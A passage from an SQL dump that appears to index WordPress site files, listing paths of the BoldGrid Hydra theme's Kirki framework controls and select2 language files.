p-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/eu.js'),(14552,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fa.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fa.js'),(14553,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fi.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fi.js'),(14554,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fr.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/fr.js'),(14555,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/gl.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/gl.js'),(14556,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/he.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/he.js'),(14557,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hi.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hi.js'),(14558,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hr.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hr.js'),(14559,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hu.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/hu.js'),(14560,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/id.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/id.js'),(14561,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/is.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/is.js'),(14562,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/it.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/it.js'),(14563,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ja.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ja.js'),(14564,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/km.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/km.js'),(14565,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ko.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ko.js'),(14566,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/lt.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/lt.js'),(14567,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/lv.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/lv.js'),(14568,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/mk.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/mk.js'),(14569,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ms.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ms.js'),(14570,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/nb.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/nb.js'),(14571,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/nl.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/nl.js'),(14572,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pl.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pl.js'),(14573,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pt-BR.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pt-BR.js'),(14574,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pt.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/pt.js'),(14575,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ro.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ro.js'),(14576,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ru.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/ru.js'),(14577,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sk.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sk.js'),(14578,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sr-Cyrl.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sr-Cyrl.js'),(14579,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sr.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sr.js'),(14580,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sv.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/sv.js'),(14581,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/th.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/th.js'),(14582,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/tr.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/tr.js'),(14583,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/uk.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/uk.js'),(14584,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/vi.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/vi.js'),(14585,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/zh-CN.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/zh-CN.js'),(14586,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/zh-TW.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/i18n/zh-TW.js'),(14587,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.full.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.full.js'),(14588,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.full.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.full.min.js'),(14589,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.js'),(14590,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.min.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/select2/js/select2.min.js'),(14591,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha-legacy.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha-legacy.js'),(14592,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha.js'),(14593,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/class-kirki-autoload.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/class-kirki-autoload.php'),(14594,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background-legacy.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background-legacy.js'),(14595,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background.js'),(14596,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/class-kirki-control-background.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/class-kirki-control-background.php'),(14597,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/class-kirki-control-code.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/class-kirki-control-code.php'),(14598,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/code.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/code.js'),(14599,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/class-kirki-control-color.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/class-kirki-control-color.php'),(14600,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/color.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/color.js'),(14601,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/class-kirki-control-color-palette.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/class-kirki-control-color-palette.php'),(14602,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/color-palette.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/color-palette.js'),(14603,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/custom/class-kirki-control-custom.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/custom/class-kirki-control-custom.php'),(14604,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/class-kirki-control-dashicons.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/class-kirki-control-dashicons.php'),(14605,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/dashicons.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/dashicons.js'),(14606,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/class-kirki-control-date.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/class-kirki-control-date.php'),(14607,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/date.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/date.js'),(14608,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/class-kirki-control-dimension.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/class-kirki-control-dimension.php'),(14609,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/dimension.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/dimension.js'),(14610,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/class-kirki-control-dimensions.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/class-kirki-control-dimensions.php'),(14611,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/dimensions.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/dimensions.js'),(14612,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/class-kirki-control-editor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/class-kirki-control-editor.php'),(14613,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/editor.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/editor.js'),(14614,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/class-kirki-control-fontawesome.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/class-kirki-control-fontawesome.php'),(14615,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/fontawesome.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/fontawesome.js'),(14616,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/class-kirki-control-generic.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/class-kirki-control-generic.php'),(14617,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/generic.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/generic.js'),(14618,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/class-kirki-control-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/class-kirki-control-image.php'),(14619,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/image.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/image.js'),(14620,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/class-kirki-control-multicheck.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/class-kirki-control-multicheck.php'),(14621,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/multicheck.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/multicheck.js'),(14622,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/class-kirki-control-multicolor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/class-kirki-control-multicolor.php'),(14623,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor-legacy.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor-legacy.js'),(14624,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor.js'),(14625,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/class-kirki-control-number.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/class-kirki-control-number.php'),(14626,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/number.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/number.js'),(14627,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/class-kirki-control-palette.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/class-kirki-control-palette.php'),(14628,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/palette.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/palette.js'),(14629,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/class-kirki-control-preset.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/class-kirki-control-preset.php'),(14630,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/preset.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/preset.js'),(14631,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/set-setting-value.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/set-setting-value.js'),(14632,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/class-kirki-control-radio.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/class-kirki-control-radio.php'),(14633,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/radio.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/radio.js'),(14634,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/class-kirki-control-radio-buttonset.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/class-kirki-control-radio-buttonset.php'),(14635,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/radio-buttonset.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/radio-buttonset.js'),(14636,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/class-kirki-control-radio-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/class-kirki-control-radio-image.php'),(14637,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/radio-image.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/radio-image.js'),(14638,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-control-repeater.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-control-repeater.php'),(14639,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-settings-repeater-setting.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-settings-repeater-setting.php'),(14640,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/repeater.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/repeater.js'),(14641,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/class-kirki-control-select.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/class-kirki-control-select.php'),(14642,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/select.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/select.js'),(14643,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/class-kirki-control-slider.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/class-kirki-control-slider.php'),(14644,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/slider.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/slider.js'),(14645,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/class-kirki-control-sortable.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/class-kirki-control-sortable.php'),(14646,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/sortable.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/sortable.js'),(14647,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/class-kirki-control-switch.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/class-kirki-control-switch.php'),(14648,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/switch.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/switch.js'),(14649,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/class-kirki-control-toggle.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/class-kirki-control-toggle.php'),(14650,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/toggle.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/toggle.js'),(14651,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/class-kirki-control-typography.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/class-kirki-control-typography.php'),(14652,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography-legacy.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography-legacy.js'),(14653,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography.js'),(14654,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-active-callback.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-active-callback.php'),(14655,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-config.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-config.php'),(14656,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-control.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-control.php'),(14657,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-field.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-field.php'),(14658,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-helper.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-helper.php'),(14659,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-init.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-init.php'),(14660,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-l10n.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-l10n.php'),(14661,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-modules.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-modules.php'),(14662,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-panel.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-panel.php'),(14663,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/